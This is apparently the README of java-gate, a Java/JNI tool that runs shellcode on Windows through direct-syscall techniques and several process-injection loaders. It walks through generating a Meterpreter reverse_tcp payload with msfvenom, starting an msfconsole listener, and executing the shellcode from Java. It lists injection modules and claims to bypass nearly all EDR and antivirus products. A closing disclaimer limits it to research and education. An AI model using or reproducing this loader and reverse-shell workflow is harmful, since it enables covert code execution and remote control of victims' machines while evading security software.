Home

Awesome

java-gate

中文文档

The java-gate project allows for the implementation of various techniques related to "Hell's Gate" using simple Java code, which involves direct system calls.

byte[] shellcode = new byte[] {(byte)0xfc, (byte)0x48, ...};
HellsGate gate = new HellsGate(shellcode);
gate.exec();

It supports multiple techniques evolved from "Hell's Gate," such as "Halo's Gate," "Recycled Gate," "Tartarus Gate," and so on. In addition to system call-related functions, it provides many common Shellcode injection techniques, such as APC injection and remote thread injection, and is compiled and built using C and NASM/MASM assembly language. Finally, it calls these techniques at the Java layer through JNI. Various low-level techniques can be achieved through simple Java code.

Introduction

Why named "java-gate": This project mainly integrates various techniques related to direct system calls, such as Hell's Gate and Halo's Gate. Therefore, it is named "Java Gate," which can also be understood as a gateway between Java and the underlying system.

Note:

Quick Start

(1) Add the jitpack repository to your Maven configuration:

<repositories>
    <repository>
        <id>jitpack.io</id>
        <url>https://jitpack.io</url>
    </repository>
</repositories>

(2) Import the project:

<dependency>
    <groupId>com.github.4ra1n</groupId>
    <artifactId>java-gate</artifactId>
    <version>0.0.2</version>
</dependency>

(3) Obtain the shellcode

Here, we'll use meterpreter as an example.

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR-IP LPORT=YOUR-PORT -f java

(4) Start the msfconsole listener

Here, we'll use meterpreter as an example.

msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set LPORT YOUR-PORT;run;"

(5) Write a test program

package me.n1ar4;

import me.n1ar4.gate.core.HellsGate;

public class Main {
    public static void main(String[] args) {
        byte buf[] = new byte[]
                {
                        (byte) 0xfc, (byte) 0x48, ...
                };
        HellsGate gate = new HellsGate(buf);
        gate.exec();
    }
}

(6) Go online

The msfconsole connection is successfully established.

The system call modules are as follows. Usage is similar to the previous examples, just change the class name.

ModuleClassDescriptionOptional
hells-gateme.n1ar4.gate.core.HellsGateHells Gate/
halos-gateme.n1ar4.gate.core.HalosGateHalos Gate/
recycled-gateme.n1ar4.gate.core.RecycledGateRecycled Gate/
ssn-syscallme.n1ar4.gate.core.SSNSyscallSSN Syscall/
tartarus-gateme.n1ar4.gate.core.TartarusGateTartarus Gate/

The loader modules are as follows. Usage is similar to the previous examples, just change the class name.

ModuleClassDescriptionOptional
apc1me.n1ar4.gate.loader.APC1LoaderAPC injection using NtTestAlert/
apc2me.n1ar4.gate.loader.APC2LoaderSimple thread-based APC injection/
crtme.n1ar4.gate.loader.CRTLoaderSimple remote thread injectionProcess name
divideme.n1ar4.gate.loader.DivideLoaderCreate process and inject into it/
early-birdme.n1ar4.gate.loader.EarlyBirdLoaderCreate new process and APC inject/
etwpme.n1ar4.gate.loader.EtwpLoaderEtwpCreateEtwThread-based injection/
ripme.n1ar4.gate.loader.RIPLoaderModify thread context RIP register and execute shellcode/

Here is an example of how to use the command-line tool.

java -jar java-gate.jar [module] [shellcode-hex-string] [optional]

Since the JVM may crash, there is a way to create a new process and execute the code.

java -jar java-gate.jar run-new-jvm [module] [shellcode-hex-string]

This is also an approach, and if you want to run this project in your custom code, you can refer to the code JavaGate#runNewJVM.

Build

There are pre-packaged versions available in the "Release" section, but if you are not confident or need to add your own features, you can manually build it by following these steps:

Please note that this project only supports Windows 64-bit and JVM 64-bit environments, so it can only be compiled and built in that environment.

(1) MSVC x64

The CMake Toolchains use the MSVC x64 tool, and most of the assembly is based on the ml64 compiler from MSVC.

(2) CMake 3.x

The C and assembly code is compiled and built using CMake to generate the corresponding DLL file for JNI. It is recommended to use CLion.

(3) NASM

Most of the assembly is compiled using MASM, but some assembly is compiled using NASM, which needs to be downloaded and configured separately in the PATH.

(4) JDK 8 & Maven

The Java part of the code is built using Java 8 and Maven. It is recommended to use IDEA.

(5) Python 3.x

This project uses Python for some auxiliary tools, which is not actually a necessary option.

Some tests

Almost Bypass all EDR/AV

References and Acknowledgements

Many thanks to the following excellent projects for providing code (most of the code in this project is based on these):

Disclaimer

This tool is intended for cybersecurity research and educational purposes only. It should not be used for any illegal activities.